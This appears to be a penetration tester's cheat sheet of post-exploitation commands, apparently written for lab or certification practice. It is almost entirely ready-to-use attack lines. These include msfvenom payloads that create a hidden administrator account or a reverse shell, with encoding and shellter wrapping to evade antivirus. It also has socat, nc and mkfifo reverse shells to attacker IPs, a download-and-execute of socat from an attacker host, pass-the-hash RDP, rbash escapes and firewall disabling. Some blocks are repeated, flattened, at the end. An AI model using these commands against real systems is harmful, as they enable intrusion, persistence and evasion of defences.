Common Operations (tty, SSH, rbash)

chown chmod su ; windows prefer C:\ instead of /

rdp


proxychains xfreerdp /d:sandbox(.local) /u:alex /p:'xxx' /v:10.5.5.20 +clipboard +drives /tls-seclevel:0

/pth:hash <-> /p:'pwd'

sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable
(-H nthash)

Check "File transfer" for drive share

Setup nc listener with a opened port from nmap to avoid firewall block from victim


msfvenom -p windows/exec CMD="cmd.exe /c net user /add pwn pwd && net localgroup administrators pwn /add && net localgroup \"Remote Desktop Users\" pwn /add" -a x86 -f exe --platform windows > X.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin
#shellter custom payload to avoid av
shellter A > N > C > .bin > N

TTY interactive shell

/usr/bin/script -qc /bin/bash /dev/null

python2 -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/sh")'

full interactive

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
wget -q http://192.168.119.125/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.185 4444 >/tmp/f

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc attacker_ip 4444 1>/tmp/backpipe

nc attkip attkport -e /bin/sh

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ echo $TERM; stty size; stty raw -echo; fg #note the value
#*enter*2

# In reverse shell
$ reset
# 
$ export SHELL=bash
$ export TERM=xterm-256color #value from b4
$ stty rows <num> columns <cols> #value from b4

PATH and SHELL fix


export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export SHELL=/bin/bash:$SHELL

#prioritized /tmp script path
export PATH=/tmp:$PATH

.c compiling

add -static if version GLIBC not found error

gcc ###.c -o {outputname}

# old glibc compatibility 
gcc (-m32) -Wl,--hash-style=both (-static) -o exploit ###.c

Compatible SSH

ssh who@10.11.1.141 -p 22 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa

Interactive session (escape rbash)

ssh alfred@10.11.1.101 -t "bash --noprofile" 

find /usr/bin/ -name find -exec /bin/bash -ip \; 

ls $PATH (for available commands)

vi
:shell=/bin/sh
:shell

Windows short path when can't use ""

Windows firewall

netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on

reboot

shutdown -r -t 10

NextLinux commands

Last updated 9 months ago

proxychains xfreerdp /d:sandbox(.local) /u:alex /p:'xxx' /v:10.5.5.20 +clipboard +drives /tls-seclevel:0 /pth:hash <-> /p:'pwd' sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable (-H nthash)

msfvenom -p windows/exec CMD="cmd.exe /c net user /add pwn pwd && net localgroup administrators pwn /add && net localgroup \"Remote Desktop Users\" pwn /add" -a x86 -f exe --platform windows > X.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin #shellter custom payload to avoid av shellter A > N > C > .bin > N

#Listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143 wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat wget -q http://192.168.119.125/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.125:143

# In reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ echo $TERM; stty size; stty raw -echo; fg #note the value #*enter*2 # In reverse shell $ reset # $ export SHELL=bash $ export TERM=xterm-256color #value from b4 $ stty rows <num> columns <cols> #value from b4